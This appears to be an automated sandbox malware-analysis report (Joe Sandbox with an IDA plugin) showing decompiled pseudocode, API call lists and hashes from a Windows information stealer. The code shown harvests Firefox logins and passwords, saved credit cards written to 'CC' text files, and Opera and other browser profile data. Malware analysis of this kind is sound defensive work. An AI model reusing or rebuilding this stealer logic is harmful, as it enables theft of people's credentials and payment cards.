                                                                                										_t115 = _t115 + 0x88;
                                                                                										_t123 = _t95;
                                                                                									} while (_t95 != 0);
                                                                                									_t107 =  *((intOrPtr*)(_t109 - 0x7c));
                                                                                								}
                                                                                								_push(_t81);
                                                                                								E0041EAA2(_t81, _t95, _t107, _t123);
                                                                                							}
                                                                                							E0041EAA2(_t81, _t95, _t107, _t123);
                                                                                							_t94 = _t107;
                                                                                						}
                                                                                						_t41 =  *0x44a0ac();
                                                                                					}
                                                                                				}
                                                                                				_pop(_t106);
                                                                                				_pop(_t80);
                                                                                				return E0041DEB4(_t41, _t80,  *(_t109 + 0x1090) ^ _t109, _t93, _t94, _t106);
                                                                                			}

                                                                                APIs
                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,(>A(C,?,?,00411258,(>A(C), ref: 004107C4
                                                                                • __snprintf.LIBCMT ref: 004107D9
                                                                                • GetPrivateProfileSectionNamesA.KERNEL32 ref: 004107EB
                                                                                  • Part of subcall function 0040F445: lstrlenA.KERNEL32(00000104,00000000,014A06E0,?,?,00413C88,00000000,00440C68,014A06E0,00000000,014A10F8,00000104,00413E0B), ref: 0040F44E
                                                                                  • Part of subcall function 0040F445: lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 0040F463
                                                                                  • Part of subcall function 0040F445: lstrcpy.KERNEL32(00000000,?), ref: 0040F482
                                                                                  • Part of subcall function 0040F445: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040F489
                                                                                  • Part of subcall function 0040F445: lstrcpy.KERNEL32(00000001,?), ref: 0040F49D
                                                                                  • Part of subcall function 0040F445: lstrlenA.KERNEL32(00000001,?,?,?,?,?,?), ref: 0040F4A4
                                                                                  • Part of subcall function 00420300: __fsopen.LIBCMT ref: 0042030D
                                                                                • _fseek.LIBCMT ref: 00410842
                                                                                • _fseek.LIBCMT ref: 00410852
                                                                                  • Part of subcall function 00420BEA: __lock_file.LIBCMT ref: 00420C2B
                                                                                  • Part of subcall function 00420BEA: __fseek_nolock.LIBCMT ref: 00420C3C
                                                                                • __fread_nolock.LIBCMT ref: 00410868
                                                                                • lstrlenA.KERNEL32 ref: 004108AF
                                                                                • _fprintf.LIBCMT ref: 004108D0
                                                                                • _fprintf.LIBCMT ref: 004108DE
                                                                                  • Part of subcall function 0041E879: __lock_file.LIBCMT ref: 0041E8C0
                                                                                  • Part of subcall function 0041E879: __stbuf.LIBCMT ref: 0041E944
                                                                                  • Part of subcall function 0041E879: __output_l.LIBCMT ref: 0041E954
                                                                                  • Part of subcall function 0041E879: __ftbuf.LIBCMT ref: 0041E95E
                                                                                • _fprintf.LIBCMT ref: 004108E5
                                                                                • _fprintf.LIBCMT ref: 004108F3
                                                                                • _fprintf.LIBCMT ref: 004108FA
                                                                                • lstrlenA.KERNEL32 ref: 00410919
                                                                                  • Part of subcall function 0040F4BC: _memset.LIBCMT ref: 0040F4F8
                                                                                  • Part of subcall function 0040F4BC: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,?,00410940,?), ref: 0040F50D
                                                                                  • Part of subcall function 0040F4BC: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040F515
                                                                                  • Part of subcall function 0040F4BC: _memmove.LIBCMT ref: 0040F56F
                                                                                • _fprintf.LIBCMT ref: 00410947
                                                                                • _fprintf.LIBCMT ref: 0041094E
                                                                                • lstrlenA.KERNEL32 ref: 0041096D
                                                                                  • Part of subcall function 0040F4BC: lstrcat.KERNEL32(0043E028,0043E028), ref: 0040F585
                                                                                  • Part of subcall function 0040F4BC: lstrcat.KERNEL32(0043E028,0043E028), ref: 0040F597
                                                                                • _fprintf.LIBCMT ref: 0041099B
                                                                                • _fprintf.LIBCMT ref: 004109A6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _fprintf$lstrlen$__lock_file_fseeklstrcatlstrcpy$BinaryCryptFolderNamesPathPrivateProfileSectionString__fread_nolock__fseek_nolock__fsopen__ftbuf__output_l__snprintf__stbuf_memmove_memset
                                                                                • String ID: %s\Mozilla\Firefox\profiles.ini$(>A(C$Host: %s$Login: %s$Password: %s$Soft: %s$hC
                                                                                • API String ID: 1811832273-1741104210
                                                                                • Opcode ID: be1ab379d4f0d7b35feaa5507a1d1b9e33798201449bcb0e3eb15057172c3fa2
                                                                                • Instruction ID: baf3850fd12081ab16c8110e9ac8bcdef673c7f06b7b7691f3d058a77f375f6e
                                                                                • Opcode Fuzzy Hash: be1ab379d4f0d7b35feaa5507a1d1b9e33798201449bcb0e3eb15057172c3fa2
                                                                                • Instruction Fuzzy Hash: AA51B8799002047ADB10BBB79C46EDF7AAD9F4535CF14043AF905A3193EA7C8891876D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 62%
                                                                                			E00427CAF(void* __ebx) {
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				_Unknown_base(*)()* _t7;
                                                                                				long _t10;
                                                                                				void* _t11;
                                                                                				int _t12;
                                                                                				void* _t14;
                                                                                				void* _t15;
                                                                                				void* _t16;
                                                                                				void* _t18;
                                                                                				intOrPtr _t21;
                                                                                				long _t26;
                                                                                				void* _t30;
                                                                                				struct HINSTANCE__* _t35;
                                                                                				intOrPtr* _t36;
                                                                                				void* _t39;
                                                                                				intOrPtr* _t41;
                                                                                				void* _t42;
                                                                                
                                                                                				_t30 = __ebx;
                                                                                				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
                                                                                				if(_t35 != 0) {
                                                                                					 *0x4497c0 = GetProcAddress(_t35, "FlsAlloc");
                                                                                					 *0x4497c4 = GetProcAddress(_t35, "FlsGetValue");
                                                                                					 *0x4497c8 = GetProcAddress(_t35, "FlsSetValue");
                                                                                					_t7 = GetProcAddress(_t35, "FlsFree");
                                                                                					__eflags =  *0x4497c0;
                                                                                					_t39 = TlsSetValue;
                                                                                					 *0x4497cc = _t7;
                                                                                					if( *0x4497c0 == 0) {
                                                                                						L6:
                                                                                						 *0x4497c4 = TlsGetValue;
                                                                                						 *0x4497c0 = E004279BF;
                                                                                						 *0x4497c8 = _t39;
                                                                                						 *0x4497cc = TlsFree;
                                                                                					} else {
                                                                                						__eflags =  *0x4497c4;
                                                                                						if( *0x4497c4 == 0) {
                                                                                							goto L6;
                                                                                						} else {
                                                                                							__eflags =  *0x4497c8;
                                                                                							if( *0x4497c8 == 0) {
                                                                                								goto L6;
                                                                                							} else {
                                                                                								__eflags = _t7;
                                                                                								if(_t7 == 0) {
                                                                                									goto L6;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					_t10 = TlsAlloc();
                                                                                					 *0x447e48 = _t10;
                                                                                					__eflags = _t10 - 0xffffffff;
                                                                                					if(_t10 == 0xffffffff) {
                                                                                						L15:
                                                                                						_t11 = 0;
                                                                                						__eflags = 0;
                                                                                					} else {
                                                                                						_t12 = TlsSetValue(_t10,  *0x4497c4);
                                                                                						__eflags = _t12;
                                                                                						if(_t12 == 0) {
                                                                                							goto L15;
                                                                                						} else {
                                                                                							E0042416A();
                                                                                							_t41 = __imp__EncodePointer;
                                                                                							_t14 =  *_t41( *0x4497c0);
                                                                                							 *0x4497c0 = _t14;
                                                                                							_t15 =  *_t41( *0x4497c4);
                                                                                							 *0x4497c4 = _t15;
                                                                                							_t16 =  *_t41( *0x4497c8);
                                                                                							 *0x4497c8 = _t16;
                                                                                							 *0x4497cc =  *_t41( *0x4497cc);
                                                                                							_t18 = E00428EFE();
                                                                                							__eflags = _t18;
                                                                                							if(_t18 == 0) {
                                                                                								L14:
                                                                                								E004279FC();
                                                                                								goto L15;
                                                                                							} else {
                                                                                								_t36 = __imp__DecodePointer;
                                                                                								_t21 =  *((intOrPtr*)( *_t36()))( *0x4497c0, E00427B80);
                                                                                								 *0x447e44 = _t21;
                                                                                								__eflags = _t21 - 0xffffffff;
                                                                                								if(_t21 == 0xffffffff) {
                                                                                									goto L14;
                                                                                								} else {
                                                                                									_t42 = E0042303F(1, 0x214);
                                                                                									__eflags = _t42;
                                                                                									if(_t42 == 0) {
                                                                                										goto L14;
                                                                                									} else {
                                                                                										__eflags =  *((intOrPtr*)( *_t36()))( *0x4497c8,  *0x447e44, _t42);
                                                                                										if(__eflags == 0) {
                                                                                											goto L14;
                                                                                										} else {
                                                                                											_push(0);
                                                                                											_push(_t42);
                                                                                											E00427A39(_t30, _t36, _t42, __eflags);
                                                                                											_t26 = GetCurrentThreadId();
                                                                                											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                                                											 *_t42 = _t26;
                                                                                											_t11 = 1;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					return _t11;
                                                                                				} else {
                                                                                					E004279FC();
                                                                                					return 0;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00421039), ref: 00427CB7
                                                                                • __mtterm.LIBCMT ref: 00427CC3
                                                                                  • Part of subcall function 004279FC: DecodePointer.KERNEL32(0000000A,00427E25,?,00421039), ref: 00427A0D
                                                                                  • Part of subcall function 004279FC: TlsFree.KERNEL32(00000027,00427E25,?,00421039), ref: 00427A27
                                                                                  • Part of subcall function 004279FC: DeleteCriticalSection.KERNEL32(00000000,00000000,773DF3A0,?,00427E25,?,00421039), ref: 00428F65
                                                                                  • Part of subcall function 004279FC: _free.LIBCMT ref: 00428F68
                                                                                  • Part of subcall function 004279FC: DeleteCriticalSection.KERNEL32(00000027,773DF3A0,?,00427E25,?,00421039), ref: 00428F8F
                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00427CD9
                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00427CE6
                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00427CF3
                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00427D00
                                                                                • TlsAlloc.KERNEL32(?,00421039), ref: 00427D50
                                                                                • TlsSetValue.KERNEL32(00000000,?,00421039), ref: 00427D6B
                                                                                • __init_pointers.LIBCMT ref: 00427D75
                                                                                • EncodePointer.KERNEL32(?,00421039), ref: 00427D86
                                                                                • EncodePointer.KERNEL32(?,00421039), ref: 00427D93
                                                                                • EncodePointer.KERNEL32(?,00421039), ref: 00427DA0
                                                                                • EncodePointer.KERNEL32(?,00421039), ref: 00427DAD
                                                                                • DecodePointer.KERNEL32(00427B80,?,00421039), ref: 00427DCE
                                                                                • __calloc_crt.LIBCMT ref: 00427DE3
                                                                                • DecodePointer.KERNEL32(00000000,?,00421039), ref: 00427DFD
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00427E0F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                • API String ID: 3698121176-3819984048
                                                                                • Opcode ID: 4f44fbee8a27556899b1be8080d97de91f67f40b77ff1bcbf12a1ba0ce3e69e2
                                                                                • Instruction ID: 243588d13aa7bb1b1c8f0d2e7a2c701057552b50d3b2cdaf04945bf35de7f862
                                                                                • Opcode Fuzzy Hash: 4f44fbee8a27556899b1be8080d97de91f67f40b77ff1bcbf12a1ba0ce3e69e2
                                                                                • Instruction Fuzzy Hash: F7315E39A54321DADB10AF75BC0965B7EA1FB46B20B50157BE504832F0DB788C42EF9C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?), ref: 0040FE2E
                                                                                • lstrcat.KERNEL32(?,\temp), ref: 0040FE40
                                                                                • CopyFileA.KERNEL32 ref: 0040FE50
                                                                                • _memset.LIBCMT ref: 0040FE60
                                                                                • lstrcat.KERNEL32(?), ref: 0040FE75
                                                                                • lstrcat.KERNEL32(?,00440C98), ref: 0040FE87
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040FE9A
                                                                                • lstrcat.KERNEL32(?,00441454), ref: 0040FEAC
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040FEBA
                                                                                • lstrcat.KERNEL32(?,.txt), ref: 0040FECC
                                                                                • DeleteFileA.KERNEL32(?), ref: 0041011B
                                                                                  • Part of subcall function 00420300: __fsopen.LIBCMT ref: 0042030D
                                                                                • StrCmpCA.SHLWAPI(00000000,00440C64), ref: 0040FFD3
                                                                                • lstrcat.KERNEL32(00000000), ref: 0040FFF1
                                                                                • StrCmpCA.SHLWAPI(?,00440C64), ref: 0040FFFF
                                                                                • lstrcat.KERNEL32(?), ref: 0041001D
                                                                                • lstrcat.KERNEL32(?,00440C64), ref: 00410035
                                                                                • _fprintf.LIBCMT ref: 004100AF
                                                                                • _fprintf.LIBCMT ref: 004100D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$File_fprintf$CopyCurrentDeleteDirectory__fsopen_memset
                                                                                • String ID: %s%s%s%s%s%s%s$.txt$\temp
                                                                                • API String ID: 1987428508-1558371589
                                                                                • Opcode ID: 2c904849e27c0097589153de83ff4c6a836ac5d328ee282efad59d48de2a0f40
                                                                                • Instruction ID: 996c30d7aa263e0f2c47c5de6c2453da62c8b9712bd35807121890938a41ba83
                                                                                • Opcode Fuzzy Hash: 2c904849e27c0097589153de83ff4c6a836ac5d328ee282efad59d48de2a0f40
                                                                                • Instruction Fuzzy Hash: 82916875940218AFDB219F60EC4DBDABB79EB09310F1004A6F609E21A0DB799ED4DF19
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 47%
                                                                                			E00410130(CHAR* __ecx, char* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                				signed int _v8;
                                                                                				char _v276;
                                                                                				char _v540;
                                                                                				char _v568;
                                                                                				char _v572;
                                                                                				intOrPtr _v576;
                                                                                				char _v580;
                                                                                				intOrPtr _v584;
                                                                                				intOrPtr _v588;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t41;
                                                                                				void* _t58;
                                                                                				void* _t63;
                                                                                				intOrPtr _t67;
                                                                                				void* _t68;
                                                                                				void* _t69;
                                                                                				void* _t70;
                                                                                				void* _t71;
                                                                                				void* _t80;
                                                                                				void* _t87;
                                                                                				signed int _t103;
                                                                                				void* _t109;
                                                                                				intOrPtr _t110;
                                                                                				void* _t114;
                                                                                				CHAR* _t116;
                                                                                				signed int _t117;
                                                                                				void* _t118;
                                                                                				void* _t120;
                                                                                				void* _t121;
                                                                                				void* _t125;
                                                                                
                                                                                				_t107 = __edx;
                                                                                				_t41 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t41 ^ _t117;
                                                                                				_v576 = _a4;
                                                                                				_v584 = _a8;
                                                                                				_v588 = _a12;
                                                                                				_t108 = __ecx;
                                                                                				_t86 = __edx;
                                                                                				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                				 *0x44a1b8( &_v276, "\\temp");
                                                                                				CopyFileA(_t108,  &_v276, 1);
                                                                                				E00427E30( &_v540, 0, 0x104);
                                                                                				wsprintfA( &_v540, "CC\\%s_%s.txt", _v576, _t86);
                                                                                				_t114 =  *0x449c48; // 0x149a450
                                                                                				_t58 =  *0x44a0a4( &_v276,  &_v580);
                                                                                				_t120 = _t118 + 0x24;
                                                                                				if(_t58 == 0) {
                                                                                					_t63 =  *0x44a058(_v580, _t114, 0xffffffff,  &_v572, _t58);
                                                                                					_t121 = _t120 + 0x14;
                                                                                					if(_t63 == 0) {
                                                                                						_t67 = E00420300( &_v540, "w");
                                                                                						_v576 = _t67;
                                                                                						if(_t67 != 0) {
                                                                                							_t68 =  *0x44a074(_v572);
                                                                                							while(1) {
                                                                                								_t131 = _t68 - 0x64;
                                                                                								if(_t68 != 0x64) {
                                                                                									break;
                                                                                								}
                                                                                								_t69 =  *0x44a094(_v572, 0);
                                                                                								_t70 =  *0x44a094(_v572, 1);
                                                                                								_t109 = _t70;
                                                                                								_t71 =  *0x44a094(_v572, 2);
                                                                                								_t87 = _t71;
                                                                                								E0041E879(_t87, _t109, _t69, __eflags);
                                                                                								_t116 = "\n";
                                                                                								E0041E879(_t87, _t109, _t116, __eflags);
                                                                                								_t110 = _v576;
                                                                                								E0041E879(_t87, _t110, _t116, __eflags);
                                                                                								E0041E879(_t87, _t110, _t116, __eflags);
                                                                                								E0041E879(_t87, _t110, _t116, __eflags);
                                                                                								E0041E879(_t87, _t110, _t116, __eflags);
                                                                                								_t107 =  *0x44a088(_v572, 3,  *0x44a080(_v572, 3, _v584, _t110, _t116, _t110, "Year: %s", _t87, _t110, _t116, _t110, "Month: %s", _t109, _v576, _t116, _v576, "Name: %s", _t69));
                                                                                								_t86 =  &_v568;
                                                                                								_t80 = E0040F94A( &_v568, _v588, _t79, _t110, _t116, __eflags);
                                                                                								_t125 = _t121 + 0x4c - 0x14;
                                                                                								_t103 = 7;
                                                                                								_t114 = _t80;
                                                                                								memcpy(_t125, _t114, _t103 << 2);
                                                                                								_t108 = _t114 + _t103 + _t103;
                                                                                								E0041E879( &_v568, _t114 + _t103 + _t103, _t114, __eflags);
                                                                                								E00402C34(_t86, 1, 0);
                                                                                								E0041E879(_t86, _t114 + _t103 + _t103, _t114, __eflags);
                                                                                								_t68 =  *0x44a074(_v572, _v576, "\n\n", _v576, "Card: %s");
                                                                                								_t121 = _t125 + 0x3c;
                                                                                							}
                                                                                							_push(_v576);
                                                                                							E0041EAA2(_t86, _t108, _t114, _t131);
                                                                                						}
                                                                                					}
                                                                                					 *0x44a078(_v572);
                                                                                					 *0x44a0a8(_v580);
                                                                                				}
                                                                                				return E0041DEB4(DeleteFileA( &_v276), _t86, _v8 ^ _t117, _t107, _t108, _t114);
                                                                                			}
                                                                                0x00410342
                                                                                0x00410348
                                                                                0x00410348
                                                                                0x00410354
                                                                                0x0041035a
                                                                                0x0041035f
                                                                                0x00410227
                                                                                0x00410366
                                                                                0x00410373
                                                                                0x00410379
                                                                                0x00410395

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _fprintf$File$CopyCurrentDeleteDirectory__fsopen_memsetlstrcatwsprintf
                                                                                • String ID: CC\%s_%s.txt$Card: %s$Month: %s$Name: %s$Year: %s$\temp$hC
                                                                                • API String ID: 913535830-1724484930
                                                                                • Opcode ID: 0472216ae950bef9f06fa0b72c1dcd568f50c42a88198bff33d8fe9cc0220aae
                                                                                • Instruction ID: 550820abe71679d22812363b38ab829dcd7c1cdab965256f1e9672bcda8c65da
                                                                                • Opcode Fuzzy Hash: 0472216ae950bef9f06fa0b72c1dcd568f50c42a88198bff33d8fe9cc0220aae
                                                                                • Instruction Fuzzy Hash: CD51B235D40218ABDB21AB25DC4EBDA7778EF05314F1400AAF909B21A1DB799ED4CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 46%
                                                                                			E00413F3C(void* __edx, intOrPtr* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                				signed int _v8;
                                                                                				char _v276;
                                                                                				char _v304;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __ebp;
                                                                                				signed int _t24;
                                                                                				intOrPtr _t67;
                                                                                				intOrPtr _t68;
                                                                                				CHAR* _t71;
                                                                                				void* _t91;
                                                                                				intOrPtr _t95;
                                                                                				intOrPtr _t96;
                                                                                				intOrPtr _t97;
                                                                                				intOrPtr _t98;
                                                                                				intOrPtr _t99;
                                                                                				intOrPtr _t100;
                                                                                				intOrPtr _t101;
                                                                                				intOrPtr _t102;
                                                                                				intOrPtr _t103;
                                                                                				intOrPtr _t104;
                                                                                				intOrPtr _t105;
                                                                                				intOrPtr _t106;
                                                                                				intOrPtr _t107;
                                                                                				intOrPtr _t108;
                                                                                				intOrPtr _t109;
                                                                                				intOrPtr _t110;
                                                                                				intOrPtr _t111;
                                                                                				intOrPtr _t112;
                                                                                				intOrPtr _t113;
                                                                                				intOrPtr _t114;
                                                                                				intOrPtr _t115;
                                                                                				intOrPtr _t116;
                                                                                				intOrPtr _t117;
                                                                                				intOrPtr _t118;
                                                                                				intOrPtr _t119;
                                                                                				intOrPtr _t120;
                                                                                				void* _t134;
                                                                                				intOrPtr _t135;
                                                                                				intOrPtr _t136;
                                                                                				intOrPtr _t137;
                                                                                				intOrPtr _t138;
                                                                                				intOrPtr _t139;
                                                                                				intOrPtr _t140;
                                                                                				intOrPtr* _t143;
                                                                                				signed int _t144;
                                                                                
                                                                                				_t148 = __eflags;
                                                                                				_t143 = __esi;
                                                                                				_t133 = __edx;
                                                                                				_t24 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t24 ^ _t144;
                                                                                				 *((intOrPtr*)(__esi + 0x28)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x24)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x34)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x30)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x38)) = 0;
                                                                                				E00413E43(_t134, __esi, __eflags, _a4, _a8);
                                                                                				_push(E00420300( *0x449f3c, "w"));
                                                                                				E0041EAA2(_t91, _t134, __esi, _t148);
                                                                                				_t135 =  *0x449e38; // 0x14a10f8
                                                                                				_t92 = __esi;
                                                                                				E00413D67(__esi, __edx, _t135, _t148,  *0x449f60);
                                                                                				_t136 =  *0x449c30; // 0x14983a0
                                                                                				E00413D67(__esi, __edx, _t136, _t148,  *0x449e0c);
                                                                                				_t137 =  *0x449e54; // 0x147f4e8
                                                                                				E00413D67(__esi, __edx, _t137, _t148,  *0x449d94);
                                                                                				_t138 =  *0x449e34; // 0x146fa10
                                                                                				E00413D67(_t92, _t133, _t138, _t148,  *0x449cc8);
                                                                                				_t139 =  *0x449fa0; // 0x1498410
                                                                                				E00413D67(_t92, _t133, _t139, _t148,  *0x449eac);
                                                                                				_t140 =  *0x449de4; // 0x14a1120
                                                                                				E00413D67(_t92, _t133, _t140, _t148,  *0x449b74);
                                                                                				_t141 =  *0x449d40; // 0x14f13c0
                                                                                				E00413D67(_t92, _t133, _t141, _t148,  *0x449efc);
                                                                                				_push("\\Opera Stable\\");
                                                                                				_push( *0x449d6c);
                                                                                				_push(__esi);
                                                                                				E004139E8(_t92, _t133, _t141, __esi, _t148);
                                                                                				_push("\\Opera GX Stable\\");
                                                                                				_push( *0x449d7c);
                                                                                				_push(_t143);
                                                                                				E004139E8(_t92, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449dc4);
                                                                                				_t95 =  *0x449d88; // 0x14a0e28
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t95, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449c64);
                                                                                				_t96 =  *0x449f44; // 0x147f3e8
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t96, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449cb4);
                                                                                				_t97 =  *0x449bb0; // 0x147f5c8
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t97, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449e64);
                                                                                				_t98 =  *0x449c44; // 0x147f468
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t98, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449dc8);
                                                                                				_t99 =  *0x449e04; // 0x147f408
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t99, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449ecc);
                                                                                				_t100 =  *0x449d64; // 0x147f668
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t100, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449ddc);
                                                                                				_t101 =  *0x44a01c; // 0x147f5e8
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t101, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449f98);
                                                                                				_t102 =  *0x449b8c; // 0x14a0f18
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t102, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449ca0);
                                                                                				_t103 =  *0x449b68; // 0x147f688
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t103, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449da4);
                                                                                				_t104 =  *0x449d38; // 0x147f488
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t104, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449b5c);
                                                                                				_t105 =  *0x449b70; // 0x147f4c8
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t105, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449f10);
                                                                                				_t106 =  *0x449db0; // 0x146f6b0
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t106, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449b94);
                                                                                				_t107 =  *0x449ee8; // 0x14a1148
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t107, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449fb8);
                                                                                				_t108 =  *0x449dc0; // 0x14a1058
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t108, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449e80);
                                                                                				_t109 =  *0x449d14; // 0x1455dc0
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t109, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449dac);
                                                                                				_t110 =  *0x449c7c; // 0x14f09c0
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t110, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449c28);
                                                                                				_t111 =  *0x449c88; // 0x14f1650
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t111, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449da0);
                                                                                				_t112 =  *0x449e10; // 0x14f17b0
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t112, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449e1c);
                                                                                				_t113 =  *0x449ec0; // 0x14a0e78
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t113, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449fb4);
                                                                                				_t114 =  *0x449ba0; // 0x14f14f0
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t114, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449bc0);
                                                                                				_t115 =  *0x449b60; // 0x14f1630
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t115, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449fe0);
                                                                                				_t116 =  *0x449f7c; // 0x14a0f68
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t116, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449bb8);
                                                                                				_t117 =  *0x449c18; // 0x14f1730
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t117, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x44a028);
                                                                                				_t118 =  *0x449ea4; // 0x14a0f90
                                                                                				_push(_t143);
